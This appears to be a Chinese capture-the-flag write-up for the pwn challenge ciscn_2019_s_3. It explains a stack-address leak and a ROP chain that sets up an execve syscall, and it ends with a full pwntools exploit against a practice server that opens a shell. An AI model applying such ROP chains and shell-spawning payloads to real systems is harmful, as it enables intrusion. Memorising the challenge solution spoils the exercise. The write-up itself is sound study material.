【pwn】ciscn_2019_s_3 -- rop，gadget利用，泄露栈地址

这道题挺好的，可以帮助我更好的理解gadget的利用以及rop技术

首先，查一下程序保护情况

拖进ida分析

这里sys_read和sys_write是系统调用函数，看汇编可以分析出来

我们首先要了解一下64位系统的系统调用

传参方式：首先将系统调用号 传入 rax，然后将参数 从左到右 依次存入 rdi，rsi，rdx寄存器中，返回值存在rax寄存器

调用号：sys_read 的调用号 为 0 ；sys_write 的调用号 为 1；stub_execve 的调用号 为 59； stub_rt_sigreturn 的调用号 为 15

调用方式: 使用 syscall 进行系统调用

可以看到它有将rax设置为3B（59），调用了execve，execve函数作用是执行一个新的程序，程序可以是二进制的可执行程序，也可以是shell、pathon脚本，这个跟system函数差不多，记录一下调用execve的地址，execve_addr=0x4004e2,在这个调用execve的函数里也看到了retn，我们可以用它继续控制程序流，接下来就是去设置execve函数的参数，通过pop指令持续控制，让rdi=/bin/sh，rsi=0，rdx=0即可获得shell

这道题还有一个地方需要注意，那就是vuln函数汇编代码那边是leave指令，只有retn指令，说明不需要覆盖原来rbp的值，buf的溢出的值为0x10，后面紧接返回地址就行

接着分析sys_read和sys_write函数，可见write的值是0x30，会将栈上一些其它的东西打印出来，这里我们直接动态调试一下，看会泄露哪些东西

这边在read这边读入'a'*0x10,然后看write会泄露什么

可以看到0x7fffffffde70这个地址处的值 0x00007fffffffdf78 已经将栈地址泄露出来，然后我们输入的值是存在0x7fffffffde50处，用0x00007fffffffdf78-0x7fffffffde50=0x128 ,这个0x128的用处是：

因为程序每次加载程序，栈地址可能都会变化，但是偏移是不变，我们可以利用这个偏移和泄露的栈地址确定到我们输入的地址，如果我们是输入/bin/sh的话，就是到我们这字符串的地址。

然后就是要确定三个参数的位置了

先来rdx：下面这个其实已经确定rsi，并会执行call函数，但是只要覆盖其返回地址就行，可以继续rop

得先确定r13,那就找r13：

pop 6次，可以填充6个0

然后就是第一个参数rdi：

可以直接利用

exp：

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io=remote("node4.buuoj.cn",27569)

vul_addr=0x4004EE

payload=b"/bin/sh\x00"+b'a'*0x8+p64(vul_addr)

io.send(payload)

io.recv(0x20)

bin_addr=u64(io.recv(8))-0x128 #此处的偏移0x128是动态调试出来的

mov_rdx_r13=0x400580

pop_r13_6=0x40059A

rdi=0x4005a3

gadget=0x4004E2

syscall_addr=0x400517

payload2=b"/bin/sh\x00"*2+p64(pop_r13_6)+p64(0)*6+p64(mov_rdx_r13)+p64(gadget)

payload2+=p64(rdi)+p64(bin_addr)+p64(syscall_addr)

io.send(payload2)

io.interactive()